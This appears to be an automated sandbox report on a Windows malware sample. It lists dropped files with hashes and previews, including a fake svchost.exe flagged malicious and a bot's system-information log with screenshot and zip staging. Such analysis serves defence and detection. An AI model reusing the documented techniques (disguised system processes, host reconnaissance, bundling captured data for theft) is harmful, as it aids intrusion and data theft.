                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.5307768226288525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYnYm8M4JYwFao+q8mUNp/4Sxd:uIjfYI7QI7V3J5sb4Sxd
                                                                                                                                                                                                              MD5:7B3CA6960E29CAD743514019E9406B11
                                                                                                                                                                                                              SHA1:3AF897B19141DD76538610D6172E8E9FE3C9AD58
                                                                                                                                                                                                              SHA-256:186D6201A7FA78CEC753BED8AF70B5F8C317984390E8A0D8FE7C43A1EFB7DBA4
                                                                                                                                                                                                              SHA-512:5C100DDFB1C8E5BDA42DC191FEC81B80B4B95D5E7E0797FC9B5E4C5A670AAE3CEF8DAB2357CF3F343B0C61868AD268F3CAC153F5938D98CC62D67CEA84865CAB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\login[1].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\login[2].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                                                              Entropy (8bit):4.802925647778009
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                              MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                              SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                              SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                              SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\login[3].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):4.470551863591405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                              MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                              SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                              SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                              SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\login[3].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\login[4].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\login[1].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\login[3].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):4.470551863591405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                              MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                              SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                              SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                              SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\login[5].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43486
                                                                                                                                                                                                              Entropy (8bit):6.064404948716681
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:CiBtrifZVO7Wg3hIBYaDWY7JXFZmoO9moOmcmoOTmoOCmoOODHuQFSFiydiGPtY/:C8Cg3klFFZmx9mxmcmxTmxCmx6uI98Za
                                                                                                                                                                                                              MD5:93C50F946A8AC6AE74EE8BF5FCA4E1D6
                                                                                                                                                                                                              SHA1:15A76B5B2B6CC1B4D8CA1699D6842FB240323582
                                                                                                                                                                                                              SHA-256:7D4FAFDBFFAF9A8AA36D0626ACD6728209D297652FA12B7AD1A3035B13950B1A
                                                                                                                                                                                                              SHA-512:C1759FD8DE200B3B257C2C010E639831BB57FBA6721EAD9E8B370B5DDC1F01D3F231790736A624A46E075A78528B15EAEC5503B5B660A6E8F7F7D33AAFF0331C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\login[1].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                                                              Entropy (8bit):4.802925647778009
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                              MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                              SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                              SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                              SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\login[5].htm

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):162
                                                                                                                                                                                                              Entropy (8bit):4.43530643106624
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                              MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                              SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                              SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                              SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\1492997734.zip

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):50085
                                                                                                                                                                                                              Entropy (8bit):7.843884566226058
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:JTraoBwizduh7f53DMy6TnCMdRSKDFoRtHmDyMEirfXmDr9HInVNlvTjXAnFhgAH:Yau7Bp6dSKpxDy5DRY/LjqO1g
                                                                                                                                                                                                              MD5:4FC204B720FF59B556D42E5A8C7A5D00
                                                                                                                                                                                                              SHA1:680C42C88DB5FB05CABBA22104CC1129B14136FE
                                                                                                                                                                                                              SHA-256:CA51FC2F92A7000EE4A3C51987337E23C17EDA4FF7230EDDB2422932E8F8FFA5
                                                                                                                                                                                                              SHA-512:81F11884DB8959931059C3C1295C67E1F1FCBA4EE7D48D01A97BC6ABF463562682D64C4AF30FEF7427C3391EA395AF2AF6222B369A20359FDC91D0DFE88502D2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:PK........adkY,C..:...........debug_28;Nov;2024_17;56;23.logUT....................0...~.p..J...R.!.mQY.M.V..*'..t..9...w.@.....d.....x.6..&/T(....>X.`..+Q..Y...,]:.........);1.+`{.zg....)!.bQ!...8....W....=.q.............0..j1.i%./x....A..Yv.....\.4..<h...T...*?I.5v....>"...T.E.....se-...0 ...g.pX/x.,..f......A..zU.Zu..i......%.g..r...).....2;k..W....#....CVh..].DO....."..2u.;.....W....`...4;..'S....h.L...9...(....5.ZUH..&...?...z..+..h.5.&.......zy$h..m.....a.s....Z8..?....U.2.GgI...np.W.......{7..s+j......r..s............P".Z4z.S..x..X..@..x)..>%.^..7...._..W....3.O..p.r3]...Q..6Qe0.........A`..=.%./.O...7..Q:...l...PK........adkY...e...6.......scr.bmpUT.................O..Y..x:...3&T.]L`.......n.k.NF...d.I.H.Y....5...Q.....3..*.5.,5...*V. U......^....^.J..9.zxdV0.. .(..{..=..f....f._%.....;.....g.}......j...m...7~..D.....6...d.#....#....n.|.r..W/.o.__....G..K....c...8..m.......{...=.G....{.8m.|....=.]..]z....w...:......G...a....D.?........?......cz..i

                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\617d763a\debug_28;Nov;2024_17;56;23.log

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1806
                                                                                                                                                                                                              Entropy (8bit):5.366080581092725
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:uXGVLbMOypxU0zc2i2LuiVGXZVV7RY6f6yZsosrOYXfVRXJsVRXDc3xw80BUYVbE:ulxpBdPSF9Xy/rJ+DAxw8bG0nX7nN
                                                                                                                                                                                                              MD5:E4DFF8657933E99D7F08523015C936DB
                                                                                                                                                                                                              SHA1:8089999714B32FAAA836053FB1B4576054C0FF94
                                                                                                                                                                                                              SHA-256:1BBBBE1B6F162A647AB06924E5682025B75A0E9B3DE8777E0DEF095395A76634
                                                                                                                                                                                                              SHA-512:7789F6FC5CB2302F89EC3124E7D161053F6931A1A3FF5CF7F4CB1C92071E9E3CE4314B2A343D539ABA31D149B0F4656D5B63BB07D80660B287A29F69E6B8D31E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:ExceptionAddress = C:\Windows\System32\KERNELBASE.dll!RaiseException + 0x0062..ExceptionCode = 0x0000071A.Last error: 0x00000000..Context:.Eip = 0x768BCC12 Eax = 0x0757F8E8 Ebx = 0x00000000.Ecx = 0x00000000 Edx = 0x00321000 Ebp = 0x0757F940.Esp = 0x0757F8E8 Esi = 0x0000071A Edi = 0x060DA590.EFlags = 0x00000246..Main module:.main 0x02BB0000-0x00063000..ThreadStart = unknown!0x02bc6970..CallStack:.C:\Windows\System32\RPCRT4.dll!RpcRaiseException + 0x003e.C:\Windows\System32\RPCRT4.dll!RpcErrorGetNextRecord + 0x0461.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x04ea.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x0553.C:\Windows\System32\RPCRT4.dll!RpcAsyncCompleteCall + 0x002c.C:\Windows\SYSTEM32\WINSTA.dll!WinStationRegisterConsoleNotification + 0x0422.C:\Windows\SYSTEM32\WINSTA.dll!WinStationQueryCurrentSessionInformation + 0x007a.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0ba5.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0b3d.C:\Windows\System32\R

                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\617d763a\scr.bmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 8, image size 1310720, cbSize 1311798, bits offset 1078
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1311798
                                                                                                                                                                                                              Entropy (8bit):2.88762694887749
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:WZtc8g1t4rA4L+JZt0h+p9Qt03bsMWDjy2quySGp6Uk9OKXN3GGOjkOVoAlOIqQT:WZtc8g1t4rA4L+JZt0h+p9Qt03bsMWDY
                                                                                                                                                                                                              MD5:367B6CEB5F87632B66FDD8871FE13931
                                                                                                                                                                                                              SHA1:F4717B54E3BB777DF5876A19908C27F291C658F2
                                                                                                                                                                                                              SHA-256:F392B4FEDBC4EA0438B4141D0C8887E26A9515DEDBFBAAAC67F989376A2295B4
                                                                                                                                                                                                              SHA-512:8DFD51F9B85ECA250683DA69FCAF3F6D382675092567CBE0F5DE415D00F4AF27077C1207853395A541B2139EC523D377499E5CA9FBEA609A7720F193AFA20D7C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:BM6.......6...(............................................................................... @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`................@...@. .@.@.@.`.@...@...@...@...@ ..@ .@ @.@ `.@ ..@ ..@ ..@ ..@@..@@ .@@@.@@`.@@..@@..@@..@@..@`..@` .@`@.@``.@`..@`..@`..@`..@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@..@...@......... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`...................... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`...

                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\617d763a\sysinfo.log

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6352
                                                                                                                                                                                                              Entropy (8bit):5.226267598329047
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Z5yRg4ZY8wWx491wA7VCJxZ/Arm5V3UmOLOb+JMO1dOmOTVd0HnhsjC5Pdmevcfg:Z4V5H0w05N1ZhP2sZA/S
                                                                                                                                                                                                              MD5:88FFC9C46F6A5895C4387BFCEE1E1907
                                                                                                                                                                                                              SHA1:68129E4AD839E82300D721988DE7EF1736EC4B44
                                                                                                                                                                                                              SHA-256:414979DB6983ABEF4F69ED4145CF6EDFEEF700ACF2FDCFDB6F994091A94F51E7
                                                                                                                                                                                                              SHA-512:0FDDC42BD11FE66CF44722878772C1C2F935122C5C77C5276F255BA568EC7842BD99BB0BB3F38CF0840E9E761C37B16E9BE8B6C20D985DEBDB6128173918CA54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:{BotVer: 4.1.2}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 28:Nov:2024}.{Local time: 17:56:33}.{GMT: -5:00}.{Uptime: 17d 6h 24m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:20839.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.8:139.0.0.0.0:0.LISTEN.TCP.192.168.2.8:49702.192.168.2.1:445.ESTAB.TCP.192.168.2.8:49703.199.232.214.172:80.TIME_WAIT.TCP.192.168.2.8:49705.13.107

                                                                                                                                                                                                              C:\Windows\apppatch\svchost.exe

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\arxtPs1STE.exe
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                              Size (bytes):216576
                                                                                                                                                                                                              Entropy (8bit):7.848217375304929
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:ErMoyX6dxajoPXA1nriwrw1cfCOSJcAb:CysxVY1nZ+b
                                                                                                                                                                                                              MD5:5415F923D36E5D49E48A46CDF5D4B082
                                                                                                                                                                                                              SHA1:93569A1B675626D3A54E9D77A4A022C255500964
                                                                                                                                                                                                              SHA-256:31BECB75A2546A0B7B0866F163424B95BF42DCB2393E0A3C31765D32C92827A4
                                                                                                                                                                                                              SHA-512:966D34B42EFCED4671FD6919DA08E3CB296E610A69A3376B82B9ABAEE8E449D823BAF4BD81B4BA0A07721865AF4C986D77133349EBB0CAD476F9988C92E105F8
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.8?.................,......*.................@.......................... .......u...............................................`..x...........................@&...............................................................................text....+.......,.................. ..`.D.......S...@.......0..............@....SC.....g............4..............@....Wp...... ...........<..............@..@.aS..................>..............@....vtzr....w...........B..............@..@.fvH....-.... .......R..............@..@.data....@.......B...Z..............@....Lx......@..........................@....sOZF...s(...P......................@....h..................................@....rsrc...x....`......................@..@.reloc...............J..............@..B........................................................................................................

                                                                                                                                                                                                              C:\Windows\apppatch\svchost.exe:Zone.Identifier

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\arxtPs1STE.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                              Static File Info

